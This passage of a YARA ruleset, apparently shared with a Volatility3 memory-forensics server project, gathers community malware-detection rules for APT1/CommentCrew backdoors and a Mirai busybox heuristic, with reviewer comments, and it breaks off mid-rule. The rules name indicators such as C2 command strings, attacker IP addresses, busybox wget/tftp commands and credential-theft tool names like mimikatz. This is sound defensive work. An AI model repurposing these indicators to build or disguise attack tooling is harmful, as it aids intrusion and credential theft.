
Volatility3 MCP Server

by Kirandawadi
malware_rules.yar (1.75 MB)
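/*
 * malware_rules.yar — concatenated community YARA rulesets (yararules.com
 * generics, AlienVault Labs APT1/CommentCrew, US-CERT TA17-117A REDLEAVES/PlugX,
 * Cylance "Deception Project", NCC Group APT15, Florian Roth APT17).
 *
 * The file was collapsed onto a few lines by the page export; it is reformatted
 * here one statement per line. Review notes:
 *   - APT1_WEBC2_TABLE had `3 of them` with only two active strings ($gif1 is
 *     commented out), so it could never match. Condition changed to
 *     `all of them`, which is what `3 of them` meant when all three were live.
 *   - PLUGX_RedLeaves: `$s2 and $s3` is now parenthesised; `and` already binds
 *     tighter than `or`, so matching is unchanged, only the intent is explicit.
 *   - Everything else (strings, hex patterns, hashes, meta) is byte-for-byte
 *     the original content. The `pe` module is imported twice; YARA accepts
 *     that. Several rules depend on `pe.*` / `filesize`, so the file must be
 *     compiled with module support.
 */

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

/* Rules that are included in several other files. */

// ELF magic at offset 0. Private: only usable from other rules' conditions.
// NOTE(review): nothing in this chunk references it — is__Mirai_gen7 below
// does not gate on it, so that rule can fire on non-ELF content too.
private rule is__elf {
    meta:
        author = "@mmorenog,@yararules"
    strings:
        $header = { 7F 45 4C 46 }
    condition:
        $header at 0
}

// Generic busybox command-string heuristic; 5 of 7 strings required.
rule is__Mirai_gen7 {
    meta:
        description = "Generic detection for MiraiX version 7"
        reference = "http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html"
        author = "unixfreaxjp"
        org = "MalwareMustDie"
        date = "2018-01-05"
    strings:
        $st01 = "/bin/busybox rm" fullword nocase wide ascii
        $st02 = "/bin/busybox echo" fullword nocase wide ascii
        $st03 = "/bin/busybox wget" fullword nocase wide ascii
        $st04 = "/bin/busybox tftp" fullword nocase wide ascii
        $st05 = "/bin/busybox cp" fullword nocase wide ascii
        $st06 = "/bin/busybox chmod" fullword nocase wide ascii
        $st07 = "/bin/busybox cat" fullword nocase wide ascii
    condition:
        5 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

/* ---------------------------------------------------------------------------
 * AlienVault Labs — APT1 / CommentCrew string signatures.
 * These are plain-string rules with no file-type or size gating; on large
 * corpora expect some noise from rules whose strings are short or generic
 * (e.g. CALENDAR_APT1, APT1_WEBC2_HEAD). Treat single hits as leads, not
 * verdicts.
 * ------------------------------------------------------------------------- */

rule LIGHTDART_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "ret.log" wide ascii
        $s2 = "Microsoft Internet Explorer 6.0" wide ascii
        $s3 = "szURL Fail" wide ascii
        $s4 = "szURL Successfully" wide ascii
        $s5 = "%s&sdate=%04ld-%02ld-%02ld" wide ascii
    condition:
        all of them
}

rule AURIGA_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "superhard corp." wide ascii
        $s2 = "microsoft corp." wide ascii
        $s3 = "[Insert]" wide ascii
        $s4 = "[Delete]" wide ascii
        $s5 = "[End]" wide ascii
        $s6 = "!(*@)(!@KEY" wide ascii
        $s7 = "!(*@)(!@SID=" wide ascii
    condition:
        all of them
}

rule AURIGA_driver_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "Services\\riodrv32" wide ascii
        $s2 = "riodrv32.sys" wide ascii
        $s3 = "svchost.exe" wide ascii
        $s4 = "wuauserv.dll" wide ascii
        $s5 = "arp.exe" wide ascii
        $pdb = "projects\\auriga" wide ascii
    condition:
        all of ($s*) or $pdb
}

// Superset of AURIGA_APT1's strings: any BANGAT_APT1 hit also fires AURIGA_APT1.
rule BANGAT_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "superhard corp." wide ascii
        $s2 = "microsoft corp." wide ascii
        $s3 = "[Insert]" wide ascii
        $s4 = "[Delete]" wide ascii
        $s5 = "[End]" wide ascii
        $s6 = "!(*@)(!@KEY" wide ascii
        $s7 = "!(*@)(!@SID=" wide ascii
        $s8 = "end binary output" wide ascii
        $s9 = "XriteProcessMemory" wide ascii
        $s10 = "IE:Password-Protected sites" wide ascii
        $s11 = "pstorec.dll" wide ascii
    condition:
        all of them
}

rule BISCUIT_GREENCAT_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "zxdosml" wide ascii
        $s2 = "get user name error!" wide ascii
        $s3 = "get computer name error!" wide ascii
        $s4 = "----client system info----" wide ascii
        $s5 = "stfile" wide ascii
        $s6 = "cmd success!" wide ascii
    condition:
        all of them
}

rule BOUNCER_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdg" wide ascii
        $s2 = "IDR_DATA%d" wide ascii
        $s3 = "asdfqwe123cxz" wide ascii
        $s4 = "Mode must be 0(encrypt) or 1(decrypt)." wide ascii
    condition:
        ($s1 and $s2) or ($s3 and $s4)
}

rule BOUNCER_DLL_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "new_connection_to_bounce():" wide ascii
        $s2 = "usage:%s IP port [proxip] [port] [key]" wide ascii
    condition:
        all of them
}

// $s1-$s4 are common Atom/RSS tokens; the rule only survives false positives
// because all of ($s*) must co-occur, or the base64 ($b*) set must.
rule CALENDAR_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "content" wide ascii
        $s2 = "title" wide ascii
        $s3 = "entry" wide ascii
        $s4 = "feed" wide ascii
        $s5 = "DownRun success" wide ascii
        $s6 = "%s@gmail.com" wide ascii
        $s7 = "<!--%s-->" wide ascii
        $b8 = "W4qKihsb+So=" wide ascii
        $b9 = "PoqKigY7ggH+VcnqnTcmhFCo9w==" wide ascii
        $b10 = "8oqKiqb5880/uJLzAsY=" wide ascii
    condition:
        all of ($s*) or all of ($b*)
}

rule COMBOS_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "Mozilla4.0 (compatible; MSIE 7.0; Win32)" wide ascii
        $s2 = "Mozilla5.1 (compatible; MSIE 8.0; Win32)" wide ascii
        $s3 = "Delay" wide ascii
        $s4 = "Getfile" wide ascii
        $s5 = "Putfile" wide ascii
        $s6 = "---[ Virtual Shell]---" wide ascii
        $s7 = "Not Comming From Our Server %s." wide ascii
    condition:
        all of them
}

rule DAIRY_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "Mozilla/4.0 (compatible; MSIE 7.0;)" wide ascii
        $s2 = "KilFail" wide ascii
        $s3 = "KilSucc" wide ascii
        $s4 = "pkkill" wide ascii
        $s5 = "pklist" wide ascii
    condition:
        all of them
}

rule GLOOXMAIL_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "Kill process success!" wide ascii
        $s2 = "Kill process failed!" wide ascii
        $s3 = "Sleep success!" wide ascii
        $s4 = "based on gloox" wide ascii
        $pdb = "glooxtest.pdb" wide ascii
    condition:
        all of ($s*) or $pdb
}

// Identical body to GLOOXMAIL_APT1 (kept as-is; both names will always fire together).
rule GOGGLES_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "Kill process success!" wide ascii
        $s2 = "Kill process failed!" wide ascii
        $s3 = "Sleep success!" wide ascii
        $s4 = "based on gloox" wide ascii
        $pdb = "glooxtest.pdb" wide ascii
    condition:
        all of ($s*) or $pdb
}

rule HACKSFASE1_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = {cb 39 82 49 42 be 1f 3a}
    condition:
        all of them
}

rule HACKSFASE2_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "Send to Server failed." wide ascii
        $s2 = "HandShake with the server failed. Error:" wide ascii
        $s3 = "Decryption Failed. Context Expired." wide ascii
    condition:
        all of them
}

rule KURTON_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)" wide ascii
        $s2 = "!(*@)(!@PORT!(*@)(!@URL" wide ascii
        $s3 = "MyTmpFile.Dat" wide ascii
        $s4 = "SvcHost.DLL.log" wide ascii
    condition:
        all of them
}

rule LONGRUN_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)" wide ascii
        $s2 = "%s\\%c%c%c%c%c%c%c" wide ascii
        $s3 = "wait:" wide ascii
        $s4 = "Dcryption Error! Invalid Character" wide ascii
    condition:
        all of them
}

rule MACROMAIL_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "svcMsn.dll" wide ascii
        $s2 = "RundllInstall" wide ascii
        $s3 = "Config service %s ok." wide ascii
        $s4 = "svchost.exe" wide ascii
    condition:
        all of them
}

rule MANITSME_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "Install an Service hosted by SVCHOST." wide ascii
        $s2 = "The Dll file that to be released." wide ascii
        $s3 = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
        $s4 = "svchost.exe" wide ascii
        $e1 = "Man,it's me" wide ascii
        $e2 = "Oh,shit" wide ascii
        $e3 = "Hallelujah" wide ascii
        $e4 = "nRet == SOCKET_ERROR" wide ascii
        $pdb1 = "rouji\\release\\Install.pdb" wide ascii
        $pdb2 = "rouji\\SvcMain.pdb" wide ascii
    condition:
        (all of ($s*)) or (all of ($e*)) or $pdb1 or $pdb2
}

rule MINIASP_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "miniasp" wide ascii
        $s2 = "wakeup=" wide ascii
        $s3 = "download ok!" wide ascii
        $s4 = "command is null!" wide ascii
        $s5 = "device_input.asp?device_t=" wide ascii
    condition:
        all of them
}

rule NEWSREELS_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)" wide ascii
        $s2 = "name=%s&userid=%04d&other=%c%s" wide ascii
        $s3 = "download ok!" wide ascii
        $s4 = "command is null!" wide ascii
        $s5 = "noclient" wide ascii
        $s6 = "wait" wide ascii
        $s7 = "active" wide ascii
        $s8 = "hello" wide ascii
    condition:
        all of them
}

rule SEASALT_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM" wide ascii
        $s2 = "upfileok" wide ascii
        $s3 = "download ok!" wide ascii
        $s4 = "upfileer" wide ascii
        $s5 = "fxftest" wide ascii
    condition:
        all of them
}

rule STARSYPOUND_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "*(SY)# cmd" wide ascii
        $s2 = "send = %d" wide ascii
        $s3 = "cmd.exe" wide ascii
        $s4 = "*(SY)#" wide ascii
    condition:
        all of them
}

rule SWORD_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>" wide ascii
        $s2 = "sleep:" wide ascii
        $s3 = "down:" wide ascii
        $s4 = "*========== Bye Bye ! ==========*" wide ascii
    condition:
        all of them
}

rule thequickbrow_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "thequickbrownfxjmpsvalzydg" wide ascii
    condition:
        all of them
}

rule TABMSGSQL_APT1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "letusgohtppmmv2.0.0.1" wide ascii
        $s2 = "Mozilla/4.0 (compatible; )" wide ascii
        $s3 = "filestoc" wide ascii
        $s4 = "filectos" wide ascii
        $s5 = "reshell" wide ascii
    condition:
        all of them
}

// Note: $f and $k each fire the rule on their own.
rule CCREWBACK1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "postvalue" wide ascii
        $b = "postdata" wide ascii
        $c = "postfile" wide ascii
        $d = "hostname" wide ascii
        $e = "clientkey" wide ascii
        $f = "start Cmd Failure!" wide ascii
        $g = "sleep:" wide ascii
        $h = "downloadcopy:" wide ascii
        $i = "download:" wide ascii
        $j = "geturl:" wide ascii
        $k = "1.234.1.68" wide ascii
    condition:
        4 of ($a,$b,$c,$d,$e) or $f or 3 of ($g,$h,$i,$j) or $k
}

rule TrojanCookies_CCREW {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "sleep:" wide ascii
        $b = "content=" wide ascii
        $c = "reqpath=" wide ascii
        $d = "savepath=" wide ascii
        $e = "command=" wide ascii
    condition:
        4 of ($a,$b,$c,$d,$e)
}

rule GEN_CCREW1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "W!r@o#n$g" wide ascii
        $b = "KerNel32.dll" wide ascii
    condition:
        any of them
}

rule Elise {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "SetElise.pdb" wide ascii
    condition:
        $a
}

rule EclipseSunCloudRAT {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "Eclipse_A" wide ascii
        $b = "\\PJTS\\" wide ascii
        $c = "Eclipse_Client_B.pdb" wide ascii
        $d = "XiaoME" wide ascii
        $e = "SunCloud-Code" wide ascii
        $f = "/uc_server/data/forum.asp" wide ascii
    condition:
        any of them
}

rule MoonProject {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "Serverfile is smaller than Clientfile" wide ascii
        $b = "\\M tools\\" wide ascii
        $c = "MoonDLL" wide ascii
        $d = "\\M tools\\" wide ascii   // duplicate of $b in the original; harmless under `any of them`
    condition:
        any of them
}

rule ccrewDownloader1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = {DD B5 61 F0 20 47 20 57 D6 65 9C CB 31 1B 65 42}
    condition:
        any of them
}

rule ccrewDownloader2 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "3gZFQOBtY3sifNOl" wide ascii
        $b = "docbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD" wide ascii
        $c = "6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJ" wide ascii
    condition:
        any of them
}

rule ccrewMiniasp {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "MiniAsp.pdb" wide ascii
        $b = "device_t=" wide ascii
    condition:
        any of them
}

// 7-byte subsequence of the 8-byte pattern in HACKSFASE1_APT1.
rule ccrewSSLBack2 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = {39 82 49 42 BE 1F 3A}
    condition:
        any of them
}

rule ccrewSSLBack3 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "SLYHKAAY" wide ascii
    condition:
        any of them
}

rule ccrewSSLBack1 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "!@#%$^#@!" wide ascii
        $b = "64.91.80.6" wide ascii
    condition:
        any of them
}

rule ccrewDownloader3 {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "ejlcmbv" wide ascii
        $b = "bhxjuisv" wide ascii
        $c = "yqzgrh" wide ascii
        $d = "uqusofrp" wide ascii
        $e = "Ljpltmivvdcbb" wide ascii
        $f = "frfogjviirr" wide ascii
        $g = "ximhttoskop" wide ascii
    condition:
        4 of them
}

rule ccrewQAZ {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "!QAZ@WSX" wide ascii
    condition:
        $a
}

rule metaxcd {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "<meta xcd=" wide ascii
    condition:
        $a
}

rule MiniASP {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $KEY = { 71 30 6E 63 39 77 38 65 64 61 6F 69 75 6B 32 6D 7A 72 66 79 33 78 74 31 70 35 6C 73 36 37 67 34 62 76 68 6A }
        $PDB = "MiniAsp.pdb" nocase wide ascii
    condition:
        any of them
}

rule DownloaderPossibleCCrew {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $a = "%s?%.6u" wide ascii
        $b = "szFileUrl=%s" wide ascii
        $c = "status=%u" wide ascii
        $d = "down file success" wide ascii
        $e = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" wide ascii
    condition:
        all of them
}

rule APT1_MAPIGET {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "%s\\Attachment.dat" wide ascii
        $s2 = "MyOutlook" wide ascii
        $s3 = "mail.txt" wide ascii
        $s4 = "Recv Time:" wide ascii
        $s5 = "Subject:" wide ascii
    condition:
        all of them
}

rule APT1_LIGHTBOLT {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $str1 = "bits.exe" wide ascii
        $str2 = "PDFBROW" wide ascii
        $str3 = "Browser.exe" wide ascii
        $str4 = "Protect!" wide ascii
    condition:
        2 of them
}

rule APT1_GETMAIL {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $stra1 = "pls give the FULL path" wide ascii
        $stra2 = "mapi32.dll" wide ascii
        $stra3 = "doCompress" wide ascii
        $strb1 = "getmail.dll" wide ascii
        $strb2 = "doCompress" wide ascii
        $strb3 = "love" wide ascii
    condition:
        all of ($stra*) or all of ($strb*)
}

rule APT1_GDOCUPLOAD {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $str1 = "name=\"GALX\"" wide ascii
        $str2 = "User-Agent: Shockwave Flash" wide ascii
        $str3 = "add cookie failed..." wide ascii
        $str4 = ",speed=%f" wide ascii
    condition:
        3 of them
}

// Base64 prefixes of the C2 command words (decoded value in the trailing comment).
rule APT1_WEBC2_Y21K {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $1 = "Y29ubmVjdA" wide ascii // connect
        $2 = "c2xlZXA" wide ascii // sleep
        $3 = "cXVpdA" wide ascii // quit
        $4 = "Y21k" wide ascii // cmd
        $5 = "dW5zdXBwb3J0" wide ascii // unsupport
    condition:
        4 of them
}

rule APT1_WEBC2_YAHOO {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $http1 = "HTTP/1.0" wide ascii
        $http2 = "Content-Type:" wide ascii
        $uagent = "IPHONE8.5(host:%s,ip:%s)" wide ascii
    condition:
        all of them
}

rule APT1_WEBC2_UGX {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii
        $exe = "DefWatch.exe" wide ascii
        $html = "index1.html" wide ascii
        $cmd1 = "!@#tiuq#@!" wide ascii
        $cmd2 = "!@#dmc#@!" wide ascii
        $cmd3 = "!@#troppusnu#@!" wide ascii
    condition:
        3 of them
}

rule APT1_WEBC2_TOCK {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $1 = "InprocServer32" wide ascii
        $2 = "HKEY_PERFORMANCE_DATA" wide ascii
        $3 = "<!---[<if IE 5>]id=" wide ascii
    condition:
        all of them
}

// FIX: the original condition was `3 of them`, but $gif1 is commented out so
// only two strings are defined; the rule could never match. `all of them` is
// the intent of `3 of them` when all three strings were live. If $gif1 is
// re-enabled, `all of them` still expresses the same requirement.
rule APT1_WEBC2_TABLE {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $msg1 = "Fail To Execute The Command" wide ascii
        $msg2 = "Execute The Command Successfully" wide ascii
        /* $gif1 = /\w+\.gif/ */
        $gif2 = "GIF89" wide ascii
    condition:
        all of them
}

rule APT1_WEBC2_RAVE {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $1 = "iniet.exe" wide ascii
        $2 = "cmd.exe" wide ascii
        $3 = "SYSTEM\\CurrentControlSet\\Services\\DEVFS" wide ascii
        $4 = "Device File System" wide ascii
    condition:
        3 of them
}

rule APT1_WEBC2_QBP {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $1 = "2010QBP" wide ascii
        $2 = "adobe_sl.exe" wide ascii
        $3 = "URLDownloadToCacheFile" wide ascii
        $4 = "dnsapi.dll" wide ascii
        $5 = "urlmon.dll" wide ascii
    condition:
        4 of them
}

rule APT1_WEBC2_HEAD {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $1 = "Ready!" wide ascii
        $2 = "connect ok" wide ascii
        $3 = "WinHTTP 1.0" wide ascii
        $4 = "<head>" wide ascii
    condition:
        all of them
}

rule APT1_WEBC2_GREENCAT {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $1 = "reader_sl.exe" wide ascii
        $2 = "MS80547.bat" wide ascii
        $3 = "ADR32" wide ascii
        $4 = "ControlService failed!" wide ascii
    condition:
        3 of them
}

rule APT1_WEBC2_DIV {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $1 = "3DC76854-C328-43D7-9E07-24BF894F8EF5" wide ascii
        $2 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide ascii
        $3 = "Hello from MFC!" wide ascii
        $4 = "Microsoft Internet Explorer" wide ascii
    condition:
        3 of them
}

rule APT1_WEBC2_CSON {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $httpa1 = "/Default.aspx?INDEX=" wide ascii
        $httpa2 = "/Default.aspx?ID=" wide ascii
        $httpb1 = "Win32" wide ascii
        $httpb2 = "Accept: text*/*" wide ascii
        $exe1 = "xcmd.exe" wide ascii
        $exe2 = "Google.exe" wide ascii
    condition:
        1 of ($exe*) and 1 of ($httpa*) and all of ($httpb*)
}

rule APT1_WEBC2_CLOVER {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $msg1 = "BUILD ERROR!" wide ascii
        $msg2 = "SUCCESS!" wide ascii
        $msg3 = "wild scan" wide ascii
        $msg4 = "Code too clever" wide ascii
        $msg5 = "insufficient lookahead" wide ascii
        $ua1 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)" wide ascii
        $ua2 = "Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12" wide ascii
    condition:
        2 of ($msg*) and 1 of ($ua*)
}

rule APT1_WEBC2_BOLID {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $vm = "VMProtect" wide ascii
        $http = "http://[c2_location]/[page].html" wide ascii
    condition:
        all of them
}

rule APT1_WEBC2_ADSPACE {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $1 = "<!---HEADER ADSPACE style=" wide ascii
        $2 = "ERSVC.DLL" wide ascii
    condition:
        all of them
}

rule APT1_WEBC2_AUSOV {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $1 = "ntshrui.dll" wide ascii
        $2 = "%SystemRoot%\\System32\\" wide ascii
        $3 = "<!--DOCHTML" wide ascii
        $4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" wide ascii
        $5 = "Ausov" wide ascii
    condition:
        4 of them
}

rule APT1_WARP {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $err1 = "exception..." wide ascii
        $err2 = "failed..." wide ascii
        $err3 = "opened..." wide ascii
        $exe1 = "cmd.exe" wide ascii
        $exe2 = "ISUN32.EXE" wide ascii
    condition:
        2 of ($err*) and all of ($exe*)
}

rule APT1_TARSIP_ECLIPSE {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $1 = "\\pipe\\ssnp" wide ascii
        $2 = "toobu.ini" wide ascii
        $3 = "Serverfile is not bigger than Clientfile" wide ascii
        $4 = "URL download success" wide ascii
    condition:
        3 of them
}

rule APT1_TARSIP_MOON {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $s1 = "\\XiaoME\\SunCloud-Code\\moon" wide ascii
        $s2 = "URL download success!" wide ascii
        $s3 = "Kugoosoft" wide ascii
        $msg1 = "Modify file failed!! So strange!" wide ascii
        $msg2 = "Create cmd process failed!" wide ascii
        $msg3 = "The command has not been implemented!" wide ascii
        $msg4 = "Runas success!" wide ascii
        $onec1 = "onec.php" wide ascii
        $onec2 = "/bin/onec" wide ascii
    condition:
        1 of ($s*) and 1 of ($msg*) and 1 of ($onec*)
}

/* Disabled in the original: a bare list of file names with `1 of them` would
 * match far too much (cmd.exe, reg.exe, update.exe, ...). The same $pay* list
 * is used as a secondary condition in APT1_aspnetreport and APT1_dbg_mess. */
/*
rule APT1_payloads {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $pay1 = "rusinfo.exe" wide ascii
        $pay2 = "cmd.exe" wide ascii
        $pay3 = "AdobeUpdater.exe" wide ascii
        $pay4 = "buildout.exe" wide ascii
        $pay5 = "DefWatch.exe" wide ascii
        $pay6 = "d.exe" wide ascii
        $pay7 = "em.exe" wide ascii
        $pay8 = "IMSCMig.exe" wide ascii
        $pay9 = "localfile.exe" wide ascii
        $pay10 = "md.exe" wide ascii
        $pay11 = "mdm.exe" wide ascii
        $pay12 = "mimikatz.exe" wide ascii
        $pay13 = "msdev.exe" wide ascii
        $pay14 = "ntoskrnl.exe" wide ascii
        $pay15 = "p.exe" wide ascii
        $pay16 = "otepad.exe" wide ascii
        $pay17 = "reg.exe" wide ascii
        $pay18 = "regsvr.exe" wide ascii
        $pay19 = "runinfo.exe" wide ascii
        $pay20 = "AdobeUpdate.exe" wide ascii
        $pay21 = "inetinfo.exe" wide ascii
        $pay22 = "svehost.exe" wide ascii
        $pay23 = "update.exe" wide ascii
        $pay24 = "NTLMHash.exe" wide ascii
        $pay25 = "wpnpinst.exe" wide ascii
        $pay26 = "WSDbg.exe" wide ascii
        $pay27 = "xcmd.exe" wide ascii
        $pay28 = "adobeup.exe" wide ascii
        $pay29 = "0830.bin" wide ascii
        $pay30 = "1001.bin" wide ascii
        $pay31 = "a.bin" wide ascii
        $pay32 = "ISUN32.EXE" wide ascii
        $pay33 = "AcroRD32.EXE" wide ascii
        $pay34 = "INETINFO.EXE" wide ascii
    condition:
        1 of them
}
*/

// Referenced by name from APT1_known_malicious_RARSilent below.
rule APT1_RARSilent_EXE_PDF {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $winrar1 = "WINRAR.SFX" wide ascii
        $str2 = "Steup=" wide ascii
    condition:
        all of them
}

rule APT1_aspnetreport {
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"
    strings:
        $url = "aspnet_client/report.asp" wide ascii
        $param = "name=%s&Gender=%c&Random=%04d&SessionKey=%s" wide ascii
        $pay1 = "rusinfo.exe" wide ascii
        $pay2 = "cmd.exe" wide ascii
        $pay3 = "AdobeUpdater.exe" wide ascii
        $pay4 = "buildout.exe" wide ascii
        $pay5 = "DefWatch.exe" wide ascii
        $pay6 = "d.exe" wide ascii
        $pay7 = "em.exe" wide ascii
        $pay8 = "IMSCMig.exe" wide ascii
        $pay9 = "localfile.exe" wide ascii
        $pay10 = "md.exe" wide ascii
        $pay11 = "mdm.exe" wide ascii
        $pay12 = "mimikatz.exe" wide ascii
        $pay13 = "msdev.exe" wide ascii
        $pay14 = "ntoskrnl.exe" wide ascii
        $pay15 = "p.exe" wide ascii
        $pay16 = "otepad.exe" wide ascii
        $pay17 = "reg.exe" wide ascii
        $pay18 = "regsvr.exe" wide ascii
        $pay19 = "runinfo.exe" wide ascii
        $pay20 = "AdobeUpdate.exe" wide ascii
        $pay21 = "inetinfo.exe" wide ascii
        $pay22 = "svehost.exe" wide ascii
        $pay23 = "update.exe" wide ascii
        $pay24 = "NTLMHash.exe" wide ascii
        $pay25 = "wpnpinst.exe" wide ascii
        $pay26 = "WSDbg.exe" wide ascii
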